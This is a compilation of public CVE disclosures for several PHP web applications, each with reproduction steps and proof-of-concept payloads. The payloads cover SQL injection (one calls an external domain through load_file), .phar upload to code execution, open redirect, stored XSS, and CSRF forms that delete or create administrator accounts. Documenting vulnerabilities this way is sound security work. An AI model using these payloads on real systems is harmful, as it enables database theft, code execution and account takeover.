SourceCodester Online Pizza Ordering System v1.0 is vulnerable to SQL Injection via the QTY parameter.

**CVE-2023-30092****All Details about CVE-2023-30092**

Software: Online Pizza Ordering System 1.0

Software Link: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html

Vulnerability Type: SQL Injection

Affected Component: QTY Parameter

Impact Denial of Service: True

Impact Code execution : True

Attack Type: Remote

Vendor of Product: Sourcecodester

**Description:**

SQL injection (SQLi) is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It generally allows an attacker to view data that they are not normally able to retrieve. The vulnerability exists in Sourcecodester Online Pizza Ordering System 1.0 in QTY parameter found during updating the cart in AJAX.php endpoint.

The Affected URL where the vulnerable parameter can be found : http://HOST/php-opos/admin/ajax.php?action=update\_cart\_qty

Impact: SQL injection attack can result in unauthorized access to sensitive data, such as passwords, credit card details, or personal user information

**Vulnerability Description:**

The QTY parameter is vulnerable to SQL injection, which allows an attacker to modify the behavior of the application and access data they should not be able to. By submitting a specially crafted payload containing SQL statements, we were able to generate an SQL error message. This indicates that the application is vulnerable to SQL injection attacks.

Reproduction/ exploit Steps: To reproduce this vulnerability:

1.  Navigate to the Online Pizza Ordering System application.
    
2.  Add a few items to the cart.
    
3.  Update the cart by updating the QTY of of item.
    

4.  Intercept the HTTP request send it to the repeater and then add single Quote (\`) to get the sql error in response from server

5.  An SQL error message is displayed, indicating that the application is vulnerable to SQL injection.
    
6.  Insert the mentioned payload in QTY parameter on the above request to confirm that the application is vulnerable to SQL injection.
    

Payload : (CASE WHEN (9603=9603) THEN SLEEP(5) ELSE 9603 END)

7.  To exploit it further, send the above request to SQLmap to exploit database.

CVE-2023-30092: GitHub - nawed20002/CVE-2023-30092

Found Information System version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: Found Information System 1.0 Multiple-SQLi## Author: nu11secur1ty## Date: 05.07.2023## Vendor: https://github.com/oretnom23## Software: https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The `cid` parameter appears to be vulnerable to SQL injection attacks.The payload '+(selectload_file('%5c%5c%5c%5c446j46zi440491hdrco5ywxzhttps://www.sourcecodester.com/user/257130/activity%5c%5coca'))+'was submitted in the cid parameter. This payload injects a SQLsub-query that calls MySQL's load_file function with a UNC file paththat references a URL on an external domain. The applicationinteracted with that domain, indicating that the injected SQL querywas executed.The attacker can get susceptible - sensitive information about thesystem, then he can perform another more dangerous attack.STATUS: HIGH Vulnerability[+]Payload:```mysql---Parameter: cid (GET)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause    Payload: page=items&cid=-9014' OR 4485=4485 AND 'MLAS'='MLAS    Type: error-based    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)    Payload: page=items&cid=-3437' OR 1 GROUP BYCONCAT(0x71786b7171,(SELECT (CASE WHEN (5811=5811) THEN 1 ELSE 0END)),0x71627a6b71,FLOOR(RAND(0)*2)) HAVING MIN(0)#    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: page=items&cid=2'+(selectload_file('\\\\446j46zi440491hdrco5ywxzhttps://www.sourcecodester.com/user/257130/activity\\oca'))+''AND (SELECT 9471 FROM (SELECT(SLEEP(3)))atkh) AND 'RWRl'='RWRl    Type: UNION query    Title: MySQL UNION query (UTF8) - 5 columns    Payload: page=items&cid=2'+(selectload_file('\\\\446j46zi440491hdrco5ywxzhttps://www.sourcecodester.com/user/257130/activity\\oca'))+''UNION ALL SELECT'UTF8',CONCAT(0x71786b7171,0x506f70715a457a794d7641625051436b4c4a52576d51645242665863795a6f594d4843426d654b46,0x71627a6b71),'UTF8','UTF8','UTF8','UTF8'#---```## Proof and Exploit:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Lost-and-Found-Information-1.0)## Time spend:00:37:00

Found Information System 1.0 SQL Injection

File upload vulnerability in CMS Made Simple through 2.2.15 allows remote authenticated attackers to gain a webshell via a crafted phar file.

**File upload bypass with .phar extension lead to RCE****Author: Riccardo Krauter @ Soter IT Security ****Summary**

The vulnerability affect the FilePicker module, it is possible to bypass the restriction and upload a malicious file with .phar extension to gain Remote Code Execution

**Steps to reproduce the issue**

Prepare a PoC file with .phar extension with arbitrary php code in it.

Login into the admin area and surf to the MicroTiny WYSIWYG editor functionality then click on the **insert/edit image** button. The screenshot below shows this steps.

A new window will be opened, now click on the search button, the CMSMS File Picker will be shown.

Now the FilePicker module will be used. Click on the upload button.

Select the .phar malicious file.

The file should be uploaded.

Surf to the .phar file to gain RCE.

The exploit is working because the upload handler checks only if the extension contains the php string (obviously phar does not match). The exploit works fine on a standard Ubuntu system, here the configuration used for the tests:

*   Linux ubuntu 5.4.0-58-generic
*   php version 7.4.3
*   Apache/2.4.41 (Ubuntu)
*   File Picker version = "1.0.5"

CVE-2021-28998: CVE/File_upload_to_RCE.md at master · beerpwn/CVE

Open redirect vulnerability in typecho 1.1-17.10.30-release via the referer parameter to Login.php.

**1\. 该问题的重现步骤是什么？**

Typecho latest version url jump vulnerability after login  
code:

    admin > Login.php
    public function action()
    {
        // protect
        $this->security->protect();
    
        /** 如果已经登录 */
        if ($this->user->hasLogin()) {
            /** 直接返回 */
            $this->response->redirect($this->options->index);
    

Typecho first determines whether the user has logged in. If it has already logged in, it directly calls the redirect () function to redirect to the home page. This jump is mainly used to determine the user's status.  
typecho首先判断用户是否已经登录，如果已经登录，则直接调用redirect()函数重定向至首页，这个跳转主要用于判断用户的状态。

    admin > Login.php
    if (NULL != $this->request->referer) {
        $this->response->redirect($this->request->referer);
    } else if (!$this->user->pass('contributor', true)) {
        /** 不允许普通用户直接跳转后台 */
        $this->response->redirect($this->options->profileUrl);
    } else {
        $this->response->redirect($this->options->adminUrl);
    }
    

If there is no login, first verify whether the user's identity is correct, if the address of the referer is not empty, then call the redirect () function to redirect through the referer parameter, the referer parameter can be controlled  
如果没有登录，则首先校验用户的身份是否正确，如果referer的地址不为空，则调用redirect()函数通过referer的参数进行重定向，referer参数可控

Follow up: redirect () function, which defines two parameters, of which the default is not permanent redirect  
跟进：redirect()函数，该函数定义了两个参数，其中默认不为永久重定向

    // Response.php 
     public function redirect($location, $isPermanently = false)
    {
        /** Typecho_Common */
        $location = Typecho_Common::safeUrl($location);
    
        if ($isPermanently) {
            header('Location: ' . $location, false, 301);
            exit;
        } else {
            header('Location: ' . $location, false, 302);
            exit;
        }
    }
    

After the referer's address is passed to the redirect () function, it will first call Typecho\_Common> static method safeUrl () to check the url, and finally determine whether to use permanent or temporary redirection according to the status of isPermanently  
referer的地址传递到redirect()函数中以后，首先会调用Typecho\_Common > 静态方法safeUrl()对url进行检查，最后根据isPermanently的状态，判断使用永久重定向还是临时重定向

Follow up: /var/Typecho/Common.php  
跟进：/var/Typecho/Common.php

    public static function safeUrl($url)
    {
        //~ 针对location的xss过滤, 因为其特殊性无法使用removeXSS函数
        //~ fix issue 66
        $params = parse_url(str_replace(array("\r", "\n", "\t", ' '), '', $url));
    
        /** 禁止非法的协议跳转 */
        if (isset($params['scheme'])) {
            if (!in_array($params['scheme'], array('http', 'https'))) {
                return '/';
            }
        }
    
        /** 过滤解析串 */
        $params = array_map(array('Typecho_Common', '__removeUrlXss'), $params);
        return self::buildUrl($params);
    }
    

Use safe\_rl to replace string in str\_replace (), replace all characters in array () list with empty string, and then parse the address of referer by calling parse\_url () function: scheme, host, port, path, etc Array to $ params variable  
Next, determine whether the protocol name is empty. If the source address is not the URL of the http protocol and https protocol, return the "/" path directly  
safeUrl内使用str\_replace()进行字符串替换，将array()列表中的所有字符替换为空字符串，然后通过调用parse\_url()函数对referer的地址进行解析：scheme，host，port，path等返回一个数组到$params变量  
接着判断，协议名称是否为空，如果来源地址不是http协议与https协议的url则直接返回 “/”路径

    /**
     * 根据parse_url的结果重新组合url
     *
     * @access public
     * @param array $params 解析后的参数
     * @return string
     */
    public static function buildUrl($params)
    {
        return (isset($params['scheme']) ? $params['scheme'] . '://' : NULL)  // 如果已经设置了协议名称，则默认在协议后面拼接''://'，否则为空
        . (isset($params['user']) ? $params['user'] . (isset($params['pass']) ? ':' . $params['pass'] : NULL) . '@' : NULL)
        . (isset($params['host']) ? $params['host'] : NULL) // 如果已经设置了主机名，则使用host参数
        . (isset($params['port']) ? ':' . $params['port'] : NULL) // 如果已经设置了端口，则默认在端口后面拼接":"，否则为空
        . (isset($params['path']) ? $params['path'] : NULL) // 如果已经设置了路径，则使用path参数
        . (isset($params['query']) ? '?' . $params['query'] : NULL) // 如果已经设置了查询，则默认在query前拼接'？' 
        . (isset($params['fragment']) ? '#' . $params['fragment'] : NULL); 如果已经设置了分段，则默认在分段前拼接''#' 
    }
    

The formatted URLs are recombined and finally returned  
格式化以后的url进行重新组合，最后返回

    /**
     * 将url中的非法xss去掉时的数组回调过滤函数
     *
     * @access private
     * @param string $string 需要过滤的字符串
     * @return string
     */
    public static function __removeUrlXss($string)
    {
        $string = str_replace(array('%0d', '%0a'), '', strip_tags($string)); // 使用strip_tags()函数，强制过滤html代码，然后使用str_replace()函数将%0d,%0a（回车，换行）字符替换为空
        return preg_replace(array(
            "/$\s*(\"|')/i",           //函数开头
            "/(\"|')\s*$/i",           //函数结尾
        ), '', $string);
    }
    

poc:

    http://127.0.0.1/admin/login.php?referer=http://www.baidu.com
    

登录前：  
  
登录后跳转：  

response：

    HTTP/1.1 302 Found
    Date: Wed, 29 Apr 2020 07:37:06 GMT
    Server: Apache/2.4.41 (Debian)
    Set-Cookie: 122609301a375f23d5f0237df98400e5__typecho_uid=1; path=/
    Set-Cookie: 122609301a375f23d5f0237df98400e5__typecho_authCode=%24T%24VThLGyoLF07ae80963105613a00721934cce56d0a; path=/
    Location: http://www.baidu.com
    Content-Length: 0
    Connection: close
    Content-Type: text/html; charset=UTF-8
    

**2\. 你期待的结果是什么？实际看到的又是什么？**

1.typecho首先判断用户登录状态  
2.如果已经登录则返回主页  
3.如果没有登录则先判断用户帐号密码是否正确，然后判断referer的来源是否为空  
4.如果不为空则调用redirect()函数进行重定向，location参数可控，即用户的referer的请求来源，恶意的攻击者可利用登录后的重定向将用户引诱至一个恶意的钓鱼页面。并且可以通过注册相似域名提高信任度，只需要将注册好的域名安装typecho，将用户重定向至自己本域的登录地址，然后通过查看本地的登录日志即可获取其他管理用户的帐号密码。  
5.rediect() > Typecho\_Common::safeUrl()函数对referer的参数进行过滤及校验协议是否为http/https  
6.rediect() > self::buildUrl()函数根据parse\_url的结果重新组合url  
7.redirect()根据isPermanently参数进行301/302跳转

修复方案：  
1.校验用户登录以后的referer地址为本域  
2.并且只允许本域内进行跳转

**3\. 问题出现的环境**

*   操作系统版本：Linux kali 5.3.0-kali2-amd64 70,能整一个 todolist 么？ #1 SMP Debian 5.3.9-3kali1 (2019-11-20) x86\_64 GNU/Linux
*   Apache/NGINX 版本：Server version: Apache/2.4.41 (Debian)，Server built: 2019-08-14T04:42:29
*   数据库版本：mariadb Ver 15.1 Distrib 10.3.20-MariaDB, for debian-linux-gnu (x86\_64) using readline 5.2
*   PHP 版本：PHP 7.3.10-1+b1 (cli) (built: Oct 13 2019 23:50:57) ( NTS )  
    Copyright (c) 1997-2018 The PHP Group  
    Zend Engine v3.3.10, Copyright (c) 1998-2018 Zend Technologies  
    with Zend OPcache v7.3.10-1+b1, Copyright (c) 1999-2018, by Zend Technologies
*   Typecho 版本：1.1-17.10.30-release
*   浏览器版本：Chromium 81.0.4044.92 built on Debian bullseye/sid, running on Debian kali-rolling  
    \[//\]: # (如有图片请附上截图)

CVE-2020-21038: typecho登录后的url重定向漏洞 | Typecho latest version url jump vulnerability after login · Issue #952 · typecho/typecho

Cross Site Scripting (XSS) vulnerability in MIPCMS 3.6.0 allows attackers to execute arbitrary code via the category name field to categoryEdit.

1.After the administrator logged in, open the following page:  
  
http://127.0.0.1/?s=/admin/article/articleCategory/  
  
2.click 'modify'  
3.fill payload in Category Name :  
  
"><imG/src=1 onerror=alert(1)>  
  
4.save  
5.The request package :  
  
POST /?s=/article/ApiAdminArticle/categoryEdit HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0  
Accept: application/json, text/plain, _/_  
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3  
Referer: http://127.0.0.1/?s=/admin/article/articleCategory/  
Content-Type: application/json;charset=utf-8  
access-key: cFaLOmUGoz9URROtxaAqe37vHSlI0LL3  
terminal: pc  
uid: 9afb4393b6cddbeb7418ab77  
access-token: 06cdb3c844508158ebb7483c221c9e63  
Content-Length: 324  
Cookie: security_level=0; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1549460630; Hm_lvt_3155433929be1afd6cef849b9709d4d7=1553359007; lang_type=zh-CN; bdshare_firstime=1549546719595; wp-settings-time-1=1551345212; PHPSESSID=65unerfghovped0ap7eokcrdi3; admin_id=1; admin_level=1; admin_name=admin; admin_secret=8b99f316efb80526f2434ded92036bff; Hm_lpvt_3155433929be1afd6cef849b9709d4d7=1553359007  
DNT: 1  
Connection: close

{"id":1,"pid":0,"name":""><imG/src=1 onerror=alert(1)>","url_name":"123","seo_title":"","template":"article.html","detail_template":"articleDetail.html","category_url":"/article/<url_name>/","category_page_url":"<category_url>index_.html","detail_url":"/article/.html","description":"","keywords":"","content":""}  

6.open the url it will trigger:  
  
http://127.0.0.1/index.php?s=/article/123/

CVE-2020-18132: There is a Store XSS in Administrator Pannel · Issue #4 · sansanyun/mipcms

Cross Site Request Forgery (CSRF) vulnerability in beescms v4 allows attackers to delete the administrator account via crafted request to /admin/admin_admin.php.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

**Comments**

Assume that the site has a root account administrator privilege

After the administrator logged in, open the following one page

POC：

    <html>
      
      <body>
      <script>history.pushState('', '', '/')</script>
        <form action="http://172.20.10.4/admin/admin_admin.php">
          <input type="hidden" name="action" value="admin&#95;del" />
          <input type="hidden" name="id" value="15" />
          <input type="hidden" name="nav" value="main" />
          <input type="hidden" name="admin&#95;p&#95;nav" value="main&#95;info" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>
    

http://172.20.10.4/admin/admin\_admin.php?nav=list\_admin\_user&admin\_p\_nav=user

1 participant

CVE-2020-22334: There is a CSRF vulnerability that can delete the administrator account · Issue #5 · source-trace/beescms

Cross Site Request Forgery (CSRF) vulnerability in Bluethrust Clan Scripts v4 allows attackers to escilate privledges to an arbitrary account via a crafted request to /members/console.php?cID=5.

After the administrator logged in, open the following one page  
one.html add a High Rank account.  

<!DOCTYPE html\>
<html\>
  <body\>
  <script\>history.pushState('', '', '/')</script\>
    <form action\="http://127.0.0.1/members/console.php?cID=5" method\="POST"\>
      <input type\="hidden" name\="newmember" value\="test2" />
      <input type\="hidden" name\="password" value\="123456" />
      <input type\="hidden" name\="password2" value\="123456" />
      <input type\="hidden" name\="set&#95;rank" value\="41" />
      <input type\="hidden" name\="submit" value\="Add&#32;New&#32;Member" />
      <input type\="hidden" name\="checkCSRF" value\="034afa58abf045d046ce7dba7b1b125e" />
      <input type\="submit" value\="Submit request" />
    </form\>
  </body\>
</html\>

CVE-2020-18131: There is one CSRF vulnerability that can add the High Rank account  · Issue #27 · bluethrust/clanscripts

SQL Injection vulnerability in victor cms 1.0 allows attackers to execute arbitrary commands via the post parameter to /post.php in a crafted GET request.

Hello, I found a SQL injection vulnerability in the post.php file. The post parameters in this file were not input filtered, and were directly brought into the database for query, which led to the vulnerability.  

poc: post=1 and sleep(2) --  
Delay the program for 2 seconds to query the data  

To fix this vulnerability, you can use prepared statements like this:  
$query = "SELECT \* FROM posts WHERE post\_id = ?";  
$stmt = $sysConnect->prepare($sql);  
$stmt->bind\_param("i", $query);  
$stmt->execute();  
$result=$stmt->fetch();

CVE-2020-23966: SQL Injection vulnerability in post.php · Issue #15 · VictorAlagwu/CMSsite

The Customizer Export/Import WordPress plugin before 0.9.6 unserializes user input provided via the settings, which could allow high privilege users such as admin to perform PHP Object Injection when a suitable gadget is present

CVE-2023-1347

Judging Management System v1.0 is vulnerable to SQL Injection. via /php-jms/review_se_result.php?mainevent_id=.

Permalink

Cannot retrieve contributors at this time

**Judging Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Prohibit-404

vendors: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /php-jms/review\_se\_result.php?mainevent\_id=

Vulnerability location: /php-jms/review\_se\_result.php?mainevent\_id=, mainevent\_id

dbname =jms\_db

\[+\] Payload: /php-jms/review\_se\_result.php?mainevent\_id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place --->

GET /php\-jms/review\_se\_result.php?mainevent\_id\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=f6bhcgo222sk31fnm99nf9tjt1
Connection: close

Tag

#php